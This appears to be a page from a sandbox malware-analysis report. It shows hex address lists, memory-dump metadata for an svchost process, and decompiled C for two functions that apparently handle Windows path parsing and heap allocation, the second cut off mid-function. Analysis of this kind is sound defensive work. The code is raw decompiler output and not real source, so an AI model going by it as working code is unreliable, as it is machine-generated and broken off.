                        0x030f6059
                        0x030f605c
                        0x030f6061
                        0x030f6061
                        0x030f6022
                        0x030f6022
                        0x030f6022
                        0x030f6025
                        0x030f602a
                        0x030f602b
                        0x030f6031
                        0x030f6037
                        0x030f6038
                        0x030f603e
                        0x030f6048
                        0x030f6049
                        0x030f604a
                        0x030f604b
                        0x030f604c
                        0x030f604d
                        0x030f6053
                        0x030f6054
                        0x030f6054
                        0x030f6062
                        0x030f6065
                        0x030f6067
                        0x030f606a
                        0x030f6070
                        0x030f6075
                        0x030f6076
                        0x030f6081
                        0x030f6087
                        0x030f6095
                        0x030f6099
                        0x030f609e
                        0x030f60a4
                        0x030f60ae
                        0x030f60b0
                        0x030f60b3
                        0x030f60b6
                        0x030f60b8
                        0x030f60ba
                        0x030f60ba
                        0x030f60ba
                        0x030f60ba
                        0x030f60be
                        0x030f60c0
                        0x030f60c5
                        0x030f60c5
                        0x030f60c5
                        0x030f60c6
                        0x030f60cd
                        0x030f6114
                        0x030f60cf
                        0x030f60cf
                        0x030f60d4
                        0x030f60d5
                        0x030f60da
                        0x030f60db
                        0x030f60e1
                        0x030f60e2
                        0x030f60e8
                        0x030f60f8
                        0x030f60fd
                        0x030f60fe
                        0x030f6102
                        0x030f6104
                        0x030f6107
                        0x030f6109
                        0x030f610b
                        0x030f610b
                        0x030f610b
                        0x030f610b
                        0x030f610f
                        0x030f610f
                        0x030f6117
                        0x030f611a
                        0x030f611f
                        0x030f6125
                        0x030f6134
                        0x030f6139
                        0x030f613f
                        0x030f6146
                        0x030f6148
                        0x030f614b
                        0x030f614d
                        0x030f614f
                        0x030f614f
                        0x030f614f
                        0x030f614f
                        0x030f6153
                        0x030f6159
                        0x030f6159
                        0x030f615c
                        0x030f6163
                        0x030f6169
                        0x030f616c
                        0x030f6172
                        0x030f6181
                        0x030f6186
                        0x030f6187
                        0x030f618b
                        0x030f6191
                        0x030f6195
                        0x030f61a3
                        0x030f61bb
                        0x030f61c0
                        0x030f61c3
                        0x030f61cc
                        0x030f61d0
                        0x030f61dc
                        0x030f61de
                        0x030f61e1
                        0x030f61e4
                        0x030f61e6
                        0x030f61e8
                        0x030f61e8
                        0x030f61e8
                        0x030f61e8
                        0x030f61e6
                        0x030f61ec
                        0x030f61f3
                        0x030f6203
                        0x030f6209
                        0x030f620a
                        0x030f6216
                        0x030f621d
                        0x030f6227
                        0x030f6241
                        0x030f6246
                        0x030f624c
                        0x030f6257
                        0x030f6259
                        0x030f625c
                        0x030f625e
                        0x030f6260
                        0x030f6260
                        0x030f6260
                        0x030f6260
                        0x030f625e
                        0x030f6264
                        0x030f6267
                        0x030f6269
                        0x030f6315
                        0x030f6315
                        0x030f631b
                        0x030f631e
                        0x030f6324
                        0x030f6327
                        0x030f632f
                        0x030f6330
                        0x030f6333
                        0x030f633a
                        0x030f633c
                        0x030f6335
                        0x030f6335
                        0x030f6335
                        0x030f633f
                        0x030f6342
                        0x030f634c
                        0x030f6352
                        0x030f6355
                        0x030f6355
                        0x030f6359
                        0x00000000
                        0x030f626f
                        0x030f6275
                        0x030f6275
                        0x030f6278
                        0x030f627e
                        0x030f627e
                        0x030f6281
                        0x030f6287
                        0x030f628d
                        0x030f6298
                        0x030f629c
                        0x030f62a2
                        0x030f629e
                        0x030f629e
                        0x030f629e
                        0x030f62a7
                        0x030f62a7
                        0x030f62aa
                        0x030f62b0
                        0x030f62f0
                        0x030f62f0
                        0x030f62f2
                        0x030f62f8
                        0x030f62fd
                        0x030f62b2
                        0x030f62b2
                        0x030f62b2
                        0x030f62b5
                        0x030f62dd
                        0x030f62e2
                        0x030f62e5
                        0x030f62b7
                        0x030f62b8
                        0x030f62bb
                        0x030f62bd
                        0x030f62c0
                        0x030f62c4
                        0x030f62cd
                        0x030f62cd
                        0x030f62c0
                        0x030f62bb
                        0x030f62b5
                        0x030f6302
                        0x030f6303
                        0x030f6305
                        0x030f6305
                        0x030f6305
                        0x030f630c
                        0x030f630c
                        0x00000000
                        0x030f627e
                        0x030f6269
                        0x030f5eac
                        0x030f5ebb
                        0x030f5ebe
                        0x030f5ecb
                        0x030f5ecb
                        0x030f5ece
                        0x030f5ece
                        0x030f5ed4
                        0x030f5ed7
                        0x030f5ed9
                        0x030f5edb
                        0x030f5edb
                        0x030f5ee1
                        0x030f5ee1
                        0x030f5ee3
                        0x030f5f20
                        0x030f5f20
                        0x030f5ee5
                        0x030f5ee5
                        0x030f5ee5
                        0x030f5ee8
                        0x030f5f11
                        0x030f5f18
                        0x030f5eea
                        0x030f5eea
                        0x030f5eed
                        0x030f5ef2
                        0x030f5ef8
                        0x030f5efb
                        0x030f5f0a
                        0x030f5f0a
                        0x030f5eed
                        0x030f5ee8
                        0x030f5f22
                        0x030f5f28
                        0x00000000
                        0x00000000
                        0x030f5f30
                        0x030f5f31
                        0x030f5f37
                        0x030f5f3a
                        0x030f5f3d
                        0x030f5f44
                        0x00000000
                        0x00000000
                        0x00000000
                        0x030f5f46
                        0x030f5f48
                        0x030f5f4d
                        0x00000000
                        0x030f5f4d
                        0x030f5dda
                        0x030f5ddf
                        0x00000000
                        0x030f5ddf
                        0x030f5dd8
                        0x030f5da7
                        0x030f5da9
                        0x030f5dac
                        0x030f5dae
                        0x00000000
                        0x030f5db4
                        0x030f5db4
                        0x00000000
                        0x030f5db4
                        0x030f5dae
                        0x030f5d88
                        0x030f5d8d
                        0x030f6363
                        0x030f6369
                        0x030f636a
                        0x030f6370
                        0x030f6372
                        0x030f637a
                        0x030f637b
                        0x030f637d
                        0x00000000
                        0x00000000
                        0x030f637f
                        0x030f6385
                        0x00000000
                        0x030f6385
                        0x030f5d38
                        0x030f5d3b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x030f5d3b
                        0x030f5d27
                        0x030f5d29
                        0x00000000
                        0x00000000
                        0x00000000
                        0x030f6360
                        0x00000000
                        0x030f6360
                        0x030f5c10
                        0x030f5c10
                        0x030f63da
                        0x030f63e5
                        0x030f63e5

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dbe495c02752569d49e8df2baebe24c711a9869f546ef072e81c498214ee88e2
                        • Instruction ID: cdd1e401b50756c836603780e2bda0fbc5346d530a7f1d44117b7e642f60c9b2
                        • Opcode Fuzzy Hash: dbe495c02752569d49e8df2baebe24c711a9869f546ef072e81c498214ee88e2
                        • Instruction Fuzzy Hash: 14426875901229CFDB64CF68C880BA9B7F1FF49304F1881AAD94DAB642E7359A85CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03044120 Relevance: .4, Instructions: 444COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 92%
                        			E03044120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x311d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0305F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E03046E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L03044620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E03046E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M030445F8))) {
												case 0:
													_v568 = 0x3001078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x30011c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L03044620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0306F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0306F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E030252A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0303EB70(1, 0x31179a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0303AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E030695D0();
																			L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0306B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E03063D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0306B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                        0x03044128
                        0x03044135
                        0x0304413c
                        0x03044141
                        0x03044145
                        0x03044147
                        0x0304414e
                        0x03044151
                        0x03044159
                        0x0304415c
                        0x03044160
                        0x03044164
                        0x03044168
                        0x0304416c
                        0x0304417f
                        0x03044181
                        0x0304446a
                        0x0304446a
                        0x0304418c
                        0x03044195
                        0x03044199
                        0x03044432
                        0x03044439
                        0x0304443d
                        0x03044442
                        0x03044447
                        0x00000000
                        0x0304419f
                        0x030441a3
                        0x030441b1
                        0x030441b9
                        0x030441bd
                        0x030445db
                        0x030445db
                        0x00000000
                        0x030441c3
                        0x030441c3
                        0x030441ce
                        0x030441d4
                        0x0308e138
                        0x0308e13e
                        0x0308e169
                        0x0308e16d
                        0x0308e19e
                        0x0308e16f
                        0x0308e16f
                        0x0308e175
                        0x0308e179
                        0x0308e18f
                        0x0308e193
                        0x00000000
                        0x0308e199
                        0x00000000
                        0x0308e199
                        0x0308e193
                        0x00000000
                        0x00000000
                        0x00000000
                        0x030441da
                        0x030441da
                        0x030441df
                        0x030441e4
                        0x030441ec
                        0x03044203
                        0x03044207
                        0x0308e1fd
                        0x03044222
                        0x03044226
                        0x0308e1f3
                        0x0308e1f3
                        0x0304422c
                        0x0304422c
                        0x03044233
                        0x0308e1ed
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x03044239
                        0x03044239
                        0x03044239
                        0x03044239
                        0x03044233
                        0x03044226
                        0x030441ee
                        0x030441ee
                        0x030441f4
                        0x03044575
                        0x0308e1b1
                        0x0308e1b1
                        0x00000000
                        0x0304457b
                        0x0304457b
                        0x03044582
                        0x0308e1ab
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x03044588
                        0x03044588
                        0x0304458c
                        0x0308e1c4
                        0x0308e1c4
                        0x00000000
                        0x03044592
                        0x03044592
                        0x03044599
                        0x0308e1be
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0304459f
                        0x0304459f
                        0x030445a3
                        0x0308e1d7
                        0x0308e1e4
                        0x00000000
                        0x030445a9
                        0x030445a9
                        0x030445b0
                        0x0308e1d1
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x030445b6
                        0x030445b6
                        0x030445b6
                        0x00000000
                        0x030445b6
                        0x030445b0
                        0x030445a3
                        0x03044599
                        0x0304458c
                        0x03044582
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x030441f4
                        0x0304423e
                        0x03044241
                        0x030445c0
                        0x030445c4
                        0x00000000
                        0x030445ca
                        0x030445ca
                        0x00000000
                        0x0308e207
                        0x0308e20f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x030445d1
                        0x00000000
                        0x00000000
                        0x030445ca
                        0x00000000
                        0x03044247
                        0x03044247
                        0x03044247
                        0x03044249
                        0x03044249
                        0x03044249
                        0x03044251
                        0x03044251
                        0x03044257
                        0x0304425f
                        0x0304426e
                        0x03044270
                        0x0304427a
                        0x0308e219
                        0x0308e219
                        0x03044280
                        0x03044282
                        0x03044456
                        0x030445ea
                        0x00000000
                        0x030445f0
                        0x0308e223
                        0x00000000
                        0x0308e223
                        0x0304445c
                        0x0304445c
                        0x00000000
                        0x0304445c
                        0x00000000
                        0x03044288
                        0x0304428c
                        0x0308e298
                        0x03044292
                        0x03044292
                        0x0304429e
                        0x030442a3
                        0x030442a7
                        0x030442ac
                        0x0308e22d
                        0x030442b2
                        0x030442b2
                        0x030442b9
                        0x030442bc
                        0x030442c2
                        0x030442ca
                        0x030442cd
                        0x030442cd
                        0x030442d4
                        0x0304433f
                        0x0304433f
                        0x030442d6
                        0x030442d6
                        0x030442d9
                        0x030442dd
                        0x030442eb
                        0x0308e23a
                        0x030442f1
                        0x03044305
                        0x0304430d
                        0x03044315
                        0x03044318
                        0x0304431f
                        0x03044322
                        0x0304432e
                        0x0304433b
                        0x0304433b
                        0x00000000
                        0x0304432e
                        0x030442eb
                        0x0304434c
                        0x0304434e
                        0x03044352
                        0x03044359
                        0x0304435e
                        0x03044361
                        0x0304436e
                        0x0304438a
                        0x0304438e
                        0x03044396
                        0x0304439e
                        0x030443a1
                        0x030443ad
                        0x030443bb
                        0x030443bb
                        0x030443ad
                        0x0304436e
                        0x030443bf
                        0x030443c5
                        0x03044463
                        0x03044463
                        0x030443ce
                        0x030443d5
                        0x030443d9
                        0x030443df
                        0x03044475
                        0x03044479
                        0x03044491
                        0x03044491
                        0x03044479
                        0x030443e5
                        0x030443eb
                        0x030443f4
                        0x030443f6
                        0x030443f9
                        0x030443fc
                        0x030443ff
                        0x030444e8
                        0x030444ed
                        0x030444f3
                        0x0308e247
                        0x00000000
                        0x030444f9
                        0x03044504
                        0x03044508
                        0x0304450f
                        0x0308e269
                        0x00000000
                        0x03044515
                        0x03044519
                        0x03044531
                        0x03044534
                        0x03044537
                        0x0304453e
                        0x03044541
                        0x0304454a
                        0x0308e255
                        0x0308e255
                        0x0308e25b
                        0x0308e25e
                        0x0308e261
                        0x0308e261
                        0x03044555
                        0x03044559
                        0x0304455d
                        0x0308e26d
                        0x0308e270
                        0x0308e274
                        0x0308e27a
                        0x0308e27d
                        0x0308e28e
                        0x0308e28e
                        0x03044563
                        0x03044563
                        0x03044569
                        0x03044569
                        0x00000000
                        0x0304455d
                        0x0304450f
                        0x00000000
                        0x030444f3
                        0x030443ff
                        0x03044405
                        0x03044405
                        0x03044405
                        0x030442ac
                        0x0304428c
                        0x03044282
                        0x03044407
                        0x0304440d
                        0x0308e2af
                        0x0308e2af
                        0x03044413
                        0x03044413
                        0x00000000
                        0x030441d4
                        0x00000000
                        0x030441c3
                        0x030441bd
                        0x03044415
                        0x03044415
                        0x03044416
                        0x03044417
                        0x03044429
                        0x0304416e
                        0x0304416e
                        0x03044175
                        0x03044498
                        0x0304449f
                        0x0308e12d
                        0x00000000
                        0x0308e133
                        0x00000000
                        0x0308e133
                        0x030444a5
                        0x030444a5
                        0x030444aa
                        0x00000000
                        0x030444bb
                        0x030444ca
                        0x030444d6
                        0x030444d7
                        0x030444d8
                        0x030444e3
                        0x030444e3
                        0x030444aa
                        0x0304417b
                        0x0304417b
                        0x0304417b
                        0x00000000
                        0x0304417b
                        0x03044175
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 01608686a06fb628ea9efddb6a6dbc6829f0c76cae1005b38fd0a388ee88a9fc
                        • Instruction ID: 29a9986754286b4432a89cad32014de5c8f316f8f7f1dead9da5d05970e095c7
                        • Opcode Fuzzy Hash: 01608686a06fb628ea9efddb6a6dbc6829f0c76cae1005b38fd0a388ee88a9fc
                        • Instruction Fuzzy Hash: 05F17DB460A3118BCB64DF1AC480B7AB7E5FF88714F59496EF885CB250E734DA81CB52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030520A0 Relevance: .4, Instructions: 420COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 92%
                        			E030520A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x3118714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E03052EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E03052EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E030258EC(_t240);
									_t221 =  *0x3115cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x3115cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E03064A2C(0x3116e40, 0x3064b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
